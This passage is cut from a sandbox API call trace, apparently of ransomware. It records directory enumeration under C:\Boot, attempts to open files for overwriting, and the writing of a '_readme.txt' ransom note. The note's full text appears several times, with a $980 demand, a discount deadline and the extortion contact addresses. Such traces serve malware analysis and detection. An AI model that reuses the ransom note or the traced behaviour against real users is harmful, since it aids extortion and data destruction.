Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.415] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0179.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.415] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.415] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.415] PathFindFileNameW (pszPath="") returned="" [0179.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.415] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.416] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0179.416] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0179.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.416] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.416] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0179.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.416] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 0 [0179.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.417] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.417] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.417] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.418] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*" (normalized: "c:\\boot\\pt-br\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.418] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.419] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.419] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0179.419] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.421] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.421] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.421] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.421] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.444] RtlAllocateHeap 